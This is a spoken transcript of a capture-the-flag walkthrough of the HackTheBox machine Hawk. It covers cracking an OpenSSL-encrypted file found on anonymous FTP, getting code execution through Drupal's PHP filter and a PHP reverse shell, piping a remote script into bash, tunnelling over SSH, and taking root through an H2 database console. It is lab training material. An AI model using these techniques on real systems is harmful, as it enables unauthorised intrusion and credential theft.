What's going on YouTube? This is Ipsec. I'm doing Hawk from HackTheBox, which is a box that can be divided up into 3 parts. The first part is cryptography related. You have to pull a file off a FTP server that allows anonymous authentication, find out that file is encrypted with OpenSSL, and then find a way to decrypt the file. That file gives you credentials to log into Drupal as an administrator user, and from there, in almost any content management system CMS like Drupal is, you can find a way to get code execution with admin by either modifying themes, creating a post with PHP code, installing a plugin. There's a lot of ways to get code execution on those type of web services. So you get a code execution on the box, and then you can exploit the database, which is a MySQL database that's written in Java called H2, and create a tunnel to the box so you can connect to the SQL database from localhost and then find a way to get code execution. It's a pretty fun box, so let's just jump in. As always, we'll start with the nmap, so nmap-sc for default scripts, sv enumerate versions, oa output all formats, put in the nmap directory and call this Hawk, then the IP address, which is 10.10.10.102. Can take some time to run, so I've already run it. Looking at the results, we see quite a bit of information. We have FTP listening on port 21. It is running it's running VSFTPD version 303. It's got anonymous FTP login allowed, and in that we have a directory called messages. This information not really that interesting. The next thing we have is SSH listening on port 22. Its banner says OpenSSH 7.6 Ubuntu 4. And if we look at this, I believe this is Ubuntu Bionic Beaver. So searching this, looking at Launchpad, we do see OpenSSH server 76p1-4 is related to Bionic. So we know this is not Ubuntu Xennial like most boxes are. This is Bionic. Not really that interesting. The next thing we have is Apache listening on port 80. Its version is 2429. And again, we could confirm this by just Googling Ubuntu HTTPD 2429, looking at the packages Ubuntu Apache 2, and we see Bionic has this. And Ubuntu Xennials would be 2418. Make that a bit bigger. So Bionic 2429. Xennial 2418. Xennial is also 2 Ubuntu 3, and Bionic's 1 Ubuntu 4. Don't know exactly how they come up with all those numbers, but easy way to flag what distro is running when you get these type of banners. The Apache looks like it is running a Drupal 7 website. It's got a HTTP robots.txt and all the standard Drupal exclusions. The one I find most interesting always is changelogs, because if we go to 10.10.10.102/changelog, we get the Drupal version most likely running, which is 7.5.8 and 2018 March 28th. So, and then finally, the last port is another HTTP service. This one's listening on 8082, and it says it's the H2 database HTTP console. Haven't really seen that one before, so I'm going to poke at it and look. And we see only remote connections are allowed. Local connections are allowed. Remote connections are disabled. So let's go and poke at that FTP service, since it's got anonymous login and it's almost instantly checked. So we do FTP 10.10.10.102, log in with anonymous, and we can do dir and get the messages directory. I'm also going to do dir-a to view all files, including hidden ones, and we don't see anything. Let's go into messages, do another dir. It's an empty directory, but if we do dir-a to view hidden files, we see there is a .drupal.txt.enc. So let's get this file, Drupal text enc. And if we cat it out, we do just get a bunch of base 64. So I'm going to do base64-d to decrypt it, and we get a bunch of gobbledygook. So I'm going to make a directory called encrypted or enc, and we're going to direct this into it. Let's call this encrypted. So if we cat this file, we get that salted thing. If we run file against it, we see that it is OpenSSL encrypted data with a salted password. So I'm going to do a wc-c against it to count the number of characters. And we see it is 176, which means it's divisible by 8. So it's most likely going to be a block cipher. If it wasn't divisible by 8, it could be like a stream cipher or just other forms of encryption. So we'll do OpenSSL-help, help, no dash there, and we can see cipher commands. So it's probably encrypted with one of these. So let's open up a different pane, and we'll say go encrypt the cipher.lst. Let's do, oh, that's annoying. I have to go to this pane to copy. So we'll copy a few of these algorithms. We'll do AES 256, 128, CBC. We'll do, that's a counter code block, I believe. We'll do ECB as well, which is electronic code block. Or counter block cipher, I think is. What is CBC? Counter block chaining, actually, I believe. CBC. Cipher block chaining. Ugh. So let's do another one. I'm picking a lot of AES because AES is common. So we'll do OFB. What is OFB? Let's do this OFB here. What are you, OFB? Output feedback. Cipher feedback. Okay. Whatever. We'll do AES 128 OFB. Now we can do, let's do some that aren't AES. We'll do the good old stream cipher, RC4 and RC4 dash CBC. Then let's pick one we haven't really heard of. Let's do ARIA 128 CBC. And that one is right there. And we'll do one last one. Let's do DES. So we got a list of cipher algorithms. Now we have to encrypt a bunch of data because the goal, what I'm doing, is try to make something that looks like that. So let's do for I in sequence 0, 8, and that was what? 176? 176. So for I in sequence 0, 8, 176. And that middle number, when sequence gets 3 characters, this is called a step variable. So if we do echo I, done, it's just going to count by 8. So, and I'm limiting it at 176 because generally when you encrypt data, you don't reduce the amount of space. So most likely the plain text behind this encrypted data is less than 176 characters. So let's just do this in a file actually. Encrypt.sh for I in 0, 8, 128. Do this will be we don't have to do it in a file. I don't know what I was thinking. Let's just do python-c print a times I. And let's swap up these quotes because I think if I did do that, then it would send Python $i instead of the number. And we'll direct that to $i. So now we should have files like the file 128 has 128 A's in it. Or 129 A's. V128. I think that's, let's do echo-n wc-c 128 A's, and then it's got a line break, so that'll be fine. So keep in mind, all the files are +1 in length, so 0 is really 1 character big because it's got a line break at the end, and that'll be fine. We're just encrypting data. It didn't have to be divisible by 8. I was just doing it so we can see if the file is 1 block long, 2 blocks long, 3 blocks long, 4 blocks long, etc. So hopefully that'll make sense eventually. So we got ciphers and we got a bunch of files. So now let's do encrypt.sh, and we'll do for cipher in cat ciphers.list do, and now we gotta do for the number, so this would be the length. We can call this length in ls grep 0 to 9. So if it begins with 0, if it begins with a number, do something with it. I'm gonna do an OpenSSL command here. Done. So we gotta figure out what the OpenSSL command to encrypt is. So OpenSSL encrypt -help, and we got -in -out. I'm guessing we just do -cipher. So I'm gonna do v ciphers.list, and let's do dash. So head -1 ciphers.list. So we'll do OpenSSL encrypt -AES256 CBC -e to encrypt -in the file. Let's do 128 -out. We'll do test, and then let's do -k to specify a passphrase, and we'll do please subscribe. So if we cat test, we get data that looks like what we expect. It looks like encrypted. So there are other things we can see. You shouldn't use passphrase. Using -iter or pbk df2 would be better. So we can see what that looks like if we do what is it? iter 20. And then we'll do please subscribe. Please subscribe. If we cat test, we can see what that looks like as well. So probably should do both the pbk df2 and -k, but I'm ignoring that first because we'd have to know the iteration count. And that's just doing something called like key stretching. It just does the encryption multiple times, I think, to make it stronger. But that means when we try to brute force it, we also have to know what iteration count it is. So I'm just ignoring that whole piece at first. And if it doesn't work with -k, then I'll go into and try and enumerate the other formats. Hopefully that makes sense. So where we're at right now is we have to identify what cipher we want to use. So let's go back to our encrypt.sh, paste the OpenSSL command, and we would do OpenSSL encrypt cipher, and then paste the whole thing. -in, this will be length. -out, we'll do length we'll just do length cipher.enc. -k, please subscribe. Looking over, that command should be good. So let's run it. Cipher. I have plural there, so let's just do that. Bash encrypt.sh. And it's doing a lot more than I expect. Maybe I just have a lot of files. Let's do ls. Go and encrypt. That's not right. It combined things. So we have like 96 AES256.ECB, which is what I expect, and then .enc dash AES256 OFB. So move that. rm stir.encrypt. How did I screw this up? Encrypt.sh. Echo this line. What do my commands look like? The commands look fine. Like, I don't see it chaining lines like it did here. Like, that's 2 files. Weird. Copy this, paste it, and that looks better. So I don't know what was going on when I don't do this echo, but it's working right now. So we can do ls-stir.enc. Then we can do zergs wc-c. And we can see all the things. So we see OFB, the output feedback is 25. So this may not be a block cipher. See the RC4s? They're not divisible by 8 either. Des, I believe 112 is. 112 divided by 8. That's 110. Yep, 14. So we can easily tell which are block ciphers and which are not just by this. So we wanted wc-c on encrypted 176. So we'll grep for 176 and then a space, because I think we have files that have 176 in it. So if I grep 176 and include the space right here, we'll only get ones that are 176 characters in length. So we have a few. We have AES 144 characters and 152 characters equal 176 in length. And we also have this ARIA. And we also got DES. So if we cat this DES, whoa, that was cool. So it's got some weird ASCII character in this, where if I cat this, my cursor went all the way up here. So starts there, goes here. It just screwed with my terminal. I found that fun. Anyways, let's look at ARIA. I made this, change the size. Cat. We don't have salted here, so I'm going to throw this algorithm out the window, I think. Got this one. Oh, we got salted there. But 128. Wait. 122. Let's do XXD against this. Okay, it's, again, weird ASCII characters. So, catting this out, we don't see salted, but if we throw it in a hex editor so we don't display all this weird junk, we do see it. So OpenSSL is always going to throw that salted beforehand. So we just have to pick what we think is going to be the most common encryption thing, or just use these to choose from. We're assuming decrypted text is somewhere between 144 and 152 characters. Not really needed to know that, but we assume it's one of these algorithms. And I'm going to choose AES256 CBC just because this is the most common first. And we can do a tool called brute force salted OpenSSL. If you don't have this, it is simply on the Kali repo, so if you just search for it, you should be able to install it. So we'll do brute force salted OpenSSL, and we want to use -H to view options, and we'll do -T for the number of threads. Let's do 10 threads. -F, the file, user share word list rocku.txt. The let's see, what's after this? We still got more options. We'll see. -C, we're gonna do the cipher. It defaults to AES256 CBC, so again, it is common. The digest -D, the message digest portion, I'm changing this to SHA-256 because if we just Google OpenSSL default message digest, we're going to see SHA-256 is the default digest. And this tool uses MD5. So I think that's all we need. So -C, AES256, CBC, -D, SHA-256, and we need to specify the file, so encrypted. Lowercase c. And we get right away password candidate friends. So let's try out that password. If we do OpenSSL encrypt -help, we have a -D option to decrypt. So -D, then specify encrypted. No, -D -in, encrypted -out, decrypted -k, friends. If we cat decrypted, wait, what? Cat encrypted. Oh, we didn't specify an algorithm. Encrypt -AES256 CBC. Cat decrypted. There we go. So that's interesting. I guess on failure, it just copies in to out. So, but cat decrypted. Daniel, the following password for the portal: pencil keyboard scanner 123. Please know when the portal is okay. So let's copy decrypted to FTP decrypted file. Okay, and we'll poke at we'll try like FTP FTP 10.10.10.102. Try Daniel. Try the password. Oh, anonymous login only. So we can't even do authenticated login. So we can ignore FTP altogether, and let's move on to Joomla since that was the next port that's listening. We could just try SSH Daniel at 10.10.10.102. Yes. Paste this in. And please try again. So that's not his password. So let's move over and check out Joomla. I think I said Joomla, I meant Drupal. So 10.10.10.102. We get the Drupal page, and let's take a full look at this. So the first thing I'm going to do while I poke at it is run a tool called Droopescan, and you can just do GitHub DROOPE scan, and it's just a Drupal scanner. And I looked at a few of them. I normally just look at the last commit date and choose the one that's been committed to most recently, because there's a lot of these CMS type scanners that just don't get updates. So Droopescan, we want to do scan Drupal -u HTTP 10.10.10.102, and looks like it's scanning. So while that goes, let's take a look at what we can do. We can first try logging in with junk, hit enter, unrecognized username and password. Try logging in with a default unrecognized username and password. So right now I'm just looking for a way to enumerate usernames. Because if we look, welcome to this, no page content, we don't really have anything. So let's go to register an account. Let's do admin junk@junk.com, create new account. Name admin is already taken, and the email address is not valid. So if we do ASD create, we just get email address not valid. So I didn't mean to do this, but I think for this video I just found a cool way to enumerate. Yeah. So if we do create account, username, and put a invalid email address, it will enumerate the user and then not create it. So if we had valid email addresses like I just did, it becomes very evident that the site was attacked because it creates a bunch of users. Putting invalid email addresses may not. So that may be something to look into and pretty cool. So we have a way to validate usernames. If we look at Daniel, we do see Daniel probably has... Oh, no, there is no username for Daniel. Is that how I spelled it? Let's cat FTP DANIEL. Daniel, create new account. Does not exist. So that's pretty cool. If we try to log in, we did that before. Request new password. We can also do it here. Unable to send email if we do request new password and it doesn't exist. It says not recognized username or password. So we have two different ways to enumerate users, and this is the way I had done it before, but it always emails users. I now like this trying account name thing because I believe that'll be silent. I'd have to look more at the back end, but yeah. So we know admin's a user, we know Daniel isn't. We can try like /user, and then a lot of things like CMSs like user1 maybe, we get access denied, user2, access denied, user3, page not found. So we know there's two users on this box. One of those users is admin. The other user is most likely the one we created a few minutes ago when I was showing the invalid valid email thing. So let us try logging in with admin. So I'm going to do pencil keyboard scanner 123 as the password. So admin log in. Page 3 could not be found. If we do user 2, we have the user ASD and his email. Yep, this is the one we did just a few minutes ago creating user accounts. So that's why you should always do invalid emails when you do this on Drupal. So it doesn't create the account and it becomes less evident you were mucking around. So let's see, what else can we do? Let's go to content, try to add content. We'll do article, and we can do filtered HTML, full HTML, and plain text. And if we go back to our Droopescan, we have plugins found PHP. So this is why it always helps to do some type of recon in the background, because we'll see, hey, there's a PHP plugin. And I know Drupal has allows PHP in the content if that plugin is enabled. So I went to modules and we're searching for PHP. We can add this filter to enable the plugin, save the configuration. Then we can go to content, add content. Then we can do anything like article. And now under this text format, we have PHP code. So we can call this article test, and then just write PHP info to prove we have code execution. There should be a preview, so we don't even have to save this page, and we get PHP code execution. Awesome. So let's see. What can we do with this? We can just create a PHP shell. So let's do locate PHP, is it lan? Locate PHP grep shell. And we'll have a bunch of various shells. Let's do this one, I think. Cat this file. Yep, this is a good one. So let's go back. Content. New content. Article. And let's change this to test. Do xclip selection primary. When I paste, I'm going to do Control-Shift-V. Nope. Let's just do selection clipboard. There we go. Now we got it. So we got a PHP shell in this. And we just got to change the IP and port. So let's do 10.10.14.17. I think that's my IP. And that was my Slack. I got to mute my computer. Sorry about that. So 10.10.10.14.17. And we'll do port 9001. NC LVNP 9000. Actually, let's create a new window. Let's name this Rev Shell. I just wanted to stay in my working directory HTTP boxes Hawk, and the previous one was in Droopescan. So NC LVNP 9001, and let us do preview. Crap, I didn't do the correct thing. So way to get out of this preview. There we go. We change it from filtered HTML to PHP code. Preview. Go back. And we get a shell as www-data. Awesome. So next thing to do is let's do a Linux enumeration. So let's fix our TTI with python-c, import pty, pty.spawn, bin bash, python3-c, import pty, pty.spawn, bin bash. There we go. Control Z to background it, stty raw minus echo, fg to foreground, and we now have like tab autocomplete, which is just nice. So I can create a www directory, and then let's move opt linenum linenum.sh here. Start a web server on Urbox. So Python m simple HTTP server, and we can curl 10.10.14.17 linenum.sh, pipe it over to bash, and we got to specify port 8000. linenum.sh, nope, 17, 8000, linenum.sh, bash. There we go. So, while that goes, let's go up to the top and see what we have. So, the Linux kernel compiled May 23rd, 2018, probably around the time this box was released, so won't look for kernel privesc. We do have 1804 LTS Bionic Beaver, usernames root and Daniel, and we have Daniel logging in from IPv6 back in July 1st. I don't know why they used the IPv6 address. That's funny. Let's see. Going down. Contents of passwd. We should have the Daniel user here. Back up. There it is. UID 1002, home Daniel. And his shell is Python 3. That is odd. User accounts. Let's go up, root, user account, get back here. Home directories, just Daniel, and only Daniel can write to it. Looks like we can go into it and look at what files are there. So that's read execute. Going down, jobs, tasks, nothing too interesting. Cron tab, nothing interesting. IP address information, gateway, name servers, TCP. We have that port 8082, that is that H2 database thing that we mentioned before. We can't see what user it's running as. Let's see. Let's see here. Apache is running as www data. That's the parent process. Is there another thing like H2? We'll probably have to do ps-ef to search this quickly. There we go. We got that H2 web server running as root. So this was listening probably on port 8082 or 8002, whatever it was, the H2 database. I see opt H2 here. So we know that may be the next thing to exploit. Scrolling down. MySQL. Nothing else is too interesting. So let's go into home. Daniel. We can get user.text. Maybe. Looking at it. User.text. Anyone can read it. So we do wc-c. User.txt. Bash histories pipe to dev null. We could go var www HTML and look at the Drupal stuff. If we cat, is it web.config? Where is the database password? Nope. Let's just do grep-r password dot. That's a lot of files. Let's grep config, grep-i config, not there. Let's do, I can't clear my terminal. What is it? Is it export term equals xterm? There we go. Now I can clear. What is the Drupal file? I thought it was web config. Is it under maybe settings? grep-i setting less sites default settings and database settings. Let's just cat that file. grep-i pass. Man, there's so much junk here. grep-v get out wildcard. Did not work. There we go. Password. Right there. So it's my terminal screwing up, but we got, let's go here and search for that. So cat that file, grep Drupal 4. I'm going to do -a3-b3. Let's just less this. Sites, default, settings. I should not be lazy and just fix my terminal completely. So, Drupal. Where's Drupal 4 Hawk? We saw it. Drupal hash. Here we go. Here's the database connection settings. So we have database user, username Drupal, password Drupal. So you don't have to do this. I'm just showing you that it was a path. So if we SSH Daniel at 10.10.10.102 and try password reuse with that Drupal for Hawk password, we get in. And then we can do import os, os dash, I think exec bash. What is os system bash. There we go. And we can escape that Python shell and get on the system as Daniel. And what that allows us to do is we can do two cool things. We can either do it from a reverse shell as www.data, or we can do it from our box. But in that process list, if we go back psef grep h2, we want to get to port 8082. I think it's 8082. 10, 10, 10, 102, 8082. We want to get to this port, the H2 console. It says remote connections are disallowed. We want to be a local connection. So we can do SSH-L, and we're going to listen on one of our local ports. I'm going to do 9002. And then the colon is going to forward it. So localhost, let's forward 127.0.0.1. And what's after this colon is being executed on the server. So we're saying on our port 9002, we could also do like 000. That's how the command looks. But most of the time, SSH only allows you to listen on your loopback address. So we're listening on 127.0.0.1, port 9002, and we're going to go through SSH. And when we go through SSH and land on the other end, we want to direct our traffic to 127.0.0.1 on port 8082. Daniel at 10, 10, 10, 102. Drupal for Hawk. And now if I do netstat on my local box, ALNP grep 9002, we see I am listening. SSH has that process. And if I go in here, 127.0.0.1, 9002, we get the console. And this is working because we're no longer remote. If we just go to a reverse shell, curl 127.0.0.1, 8082, we get the same thing, but we're getting a JavaScript error because the console wants JavaScript. So if we want to do the shell without doing this local thing, we can go back to where we're at on www.data, and we can do SSH-R for reverse, and then the same thing. So we'll say 8082, 127.0.0.1. Is this right? I think this is right. Meaning, let's see. I always get these two confused. We'll try this and then reverse the ports and we'll find out which one's correct. So let's do passwd ipsec passwd ip, set a password. Okay. Service SSH start. Okay. Go to reverse shell, ip at 10, 10, 14, 17. Yes. Put the password. And we may get in. Did I type my password correctly? Let's try that again. Password, v etsy passwd, ip. He has a shell. There we go. So now I'm in. If we go back to my box, netstat ALNP grep 9003, not listening, grep 8082, I am listening. So I had that backwards. So let's go back in the shell. SSH-R 9003 8082. So this is going to go through the tunnel, and it's going to force my Linux box to listen on port 9003, and that will have access to 8082 on this box. So let's try this. 8082 is not listening. 9003 is. And if we try to log into 127.0.0.1, 9003, we get the same thing. So we just did a local and reverse. I think it's dash R is reverse. But we just did a SSH tunnel from SSH and to SSH or whatever. We did SSH tunnels both ways. So let's now begin looking at this H2 console and exploiting it. The first thing I'm going to do is go back to my box, and we got to get a shell. So import os.system bash. I'm going to see if I can find the credentials to that H2 database. So if we do ps-ef grep h2, it's in opt h2, so I'm guessing the creds are probably somewhere in that directory, and we get permission denied. So I don't think we can find those creds. ps-ef grep h2 cd proc 799 cmd line, don't get anything. Cat environment, permission denied. What can we look at? Root, permission denied. I don't think we can really get anything. I don't know why I was going into that process directory. No idea what I was thinking, but let's just do search exploit h2, and we get a few things. H2 database alias, H2O, not it. So information disclosure, we'll start there. So search exploit -x. Does this give us anything about creds? Secure handling. Permissions of the backup functions allow attackers to read sensitive files outside the permission. So this is a credentialed thing probably. And that's cool. Special thanks to HTB, HackTheBox, and the Fallen Angels team. So thank you for creating the script. But I wish it would tell us what we had to do. -h -d-f. Output directory. Let's just execute this and see what happens. So search exploit, I think -m for mirror. There we go. Python 4.5. -h 127. Does it have creds hard-coded? SA? Admin? Nope. So let's try Python 45105 -d temp-f etc shadow. Try this. We need -h 127.0.0.1 9003. File zipped in temp. So let's go back to a shell, cd temp, and let's temp grep 822, ls grep 822. I'm going to say I don't know how this exploit works. Let's just, I guess, do it locally on the box real quick, and then we'll move to the next one. Python m simple HTTP server 80. We'll do 8000 again. Already in use. So we're still listening. Let's go to Daniel ls curl 10 10 14 17 slash what's that script name? 45105 45105.py to exploit.py. Python exploit.py, Python 3 exploit.py, and this script probably requires Python 2. So I'm going to ignore this whole thing, and let's go search exploit -x h2 search for H2, not -x. Let's go to this alias one. So let's search exploit-x. We can look at this. H2 database, gambler. He's got a blog post about it. So instead of looking at this code, let's check out the blog post. So introduce the H2 database, content. So this is a way to create a shell. So let's try default passwords. Let's try first SA, no password. Test connection. Wrong username, SA, admin. SA. Let's try ADMIN. ADMIN. Connect. I wonder if test isn't working. Nope. Let's try username, SA. Let's just Google H2 database default credential. Let's see. User SA, password nothing. JDBC. Let's just check if the creds were in like the command line. So go back to SSH, PSEF, grep H2, and we don't see any creds. Let's go back here. Let's change the JDBC URL out of test. Let's just go to root. Invalid database name. Let's just create our own database name, and we get connected. So there we go. Now this screen's looking familiar, as it's what we see here. So let's copy this command, paste it in, run, and we get code execution as root. So we can do like wc-c root.txt, and we see the code execution. And on this article, there's actually this really cool thing, RSG, reverse shell generator, that I may be using from now on. So if we do cd/opt, get clone, cd_rsg, let's do /rsg, no module name, less install.sh, what are you doing? Pip install -o dependencies, and then doing a symlink, that's fine. So let's install this. And I just looked at this. I've never actually ran it before, but this ASCII term, or ASCII cinema, was pretty cool. Git clone, install, and now RSG, IP address, port, and then it gives you a bunch of reverse shells that's on that like reverse shell cheat sheet. So we should have that installed. Let's do RSG 10, 14, 17, port. We'll do 9004 now. And we get a bunch of shells. Ooh, even a PowerShell one. Nice. So let's go up. Let's do this. We'll try this bash reverse shell first, and just go down the list until we get one. So H2 console, replace this with our shell. And then nclvnp 9004, run. Did not get a callback. So let's do the next one. Try this reverse shell. And one of these will hopefully work. Well, it's a lot of blank space. Click go. Undefined function. It's got a bunch of bad characters probably. Perl. Copy. Paste. Run. Nope. Netcat? Netcat shouldn't fail, as long as it has the right version of Netcat on it. run, and see. Nope. So maybe this isn't as cool as I thought it would be. Let's do netcat reverse shell this way. Let's just do it without any special characters. So we'll first mknod. Oh wait, I think I have, let's make this bigger. There we go. Run. Did not get the shell. Paste, run this. That command succeeded. And where'd it go? Here we go. Paste, run. Not getting anything back. There we go. We got a shell. Maybe. Oh, we got a connection back. No shell. Sad day. So let's try the Python one. This may have bad characters. Python 3. I think I deleted too much. Paste, and we want to specify Python 3. Run. No shell. So let's go back up here and test this bash reverse shell. I don't know how that's working actually. It's not typing bash first. Let's try this one. So let's go to Daniel, run this, tmux, we get a connection. So it must be a bad character. That's the session I want. So let's do vi exec.sh, paste this in, chmod plus x, exec.sh, go back to 7, LVNP 9004, and we can just call, where's Python 3? Oh, I didn't put a single quote there. Doesn't look like it mattered. But bash temp exec.sh. This should work. Exec ID, run. We broke it completely. So let's go back, copy as example, and run it again. Create alias. Let's do shell exec2 maybe. There's Java, has next, call, shell exec2 ID. Reload this page. I may end up reverting this box and doing it again. Let's do database, connect. No suitable driver. IPsec. Test connection. I think we crashed it. I think something we did crashed this service. IPsec test. And we're waiting. So it didn't like something we did. I'm going to revert this box and we will try again. The box has been reverted, so if we try to go to the page again, we get an unable connect because our SSH tunnels aren't existing yet. So very valuable lesson. Always create some type of dev environment before you do exploits, because even things you think may be benign can have bad effects. So let's kill all our tmux panes, and since we reverted the box, clean up and start from scratch. So let's see. Okay, we're back here, and let's do SSH-L. We'll do listen on port 9003, localhost, and we want to connect to 8082. We're going to use Daniel at 10.10.10.102, I think. And the password was Drupal, I keep mistyping, DRUPAL for Hawk. There we go. We're logged in. We should now be able to get to the H2 console. We test the connection with test, invalid username and password. Create our own database, like please subscribe to me. Test connection. Test successful. We can connect. Test his payload out. Run. We are root. So let's go back to SSH. Escape this. OS system bash. Okay. cd temp v exec.sh. And we want to do rsg 10.10.14.17 port 9004. And let's grab the bash one. So grab this. We verified this works. Bin bash. Paste this in. chmod plus x exec.sh. So if we do temp exec.sh, I don't know why I created this pane. nclvnp 9004, run, we get a connection. Okay. So now we should just be able to call temp exec.sh. No bad characters there at all. Run. And there we go. We got the shell. So wc-c root.txt. There we go. And that's funny. It created the database here. But, yep. That is the box. So hope you guys enjoyed it. Take care, and I will see you all next week. Actually, I misspoke. I want to show one last thing. I was recording the intro for this video. I always record the intros after I do the whole box, so I know exactly what's going to be in the video if I run into troubles, whatnot. But I was looking at exactly what H2 is, and H2 database is literally just a Java MySQL database. So if we go here, H2 is a Java SQL. So it clicked that the credentials to get in immediately. So if we do localhost port 9003, this just created a whole new database, which is why if we go to root, cd/root, these are probably MySQL databases. So Drupal.move, let's see. File, data. But this is probably MySQL stuff. So let's try Drupal and test connection. We get wrong username and password. So let's go into the Drupal config file, var.html, get denied. Let's just do something stupid and give chmod -r 777 var.html. Give everyone access to this. And then the config file was in sites, default, and then settings.php. Whoops. Drupal. Hawk. There we go. And here's the database connection file. So we could just say the database is Drupal, the username is Drupal, and the password is Drupal for Hawk. So if we go here and put the URL as Drupal, the username as Drupal, and the password as Drupal for Hawk. Test connection, connected. Got to put the password in. And now we're in the Drupal database. So this is probably the correct way to do it, and is probably just unintended that you can specify a non-existent database and it creates it for you. So now that's the box. Hope you guys enjoyed. Take care, and I'll see you all next week.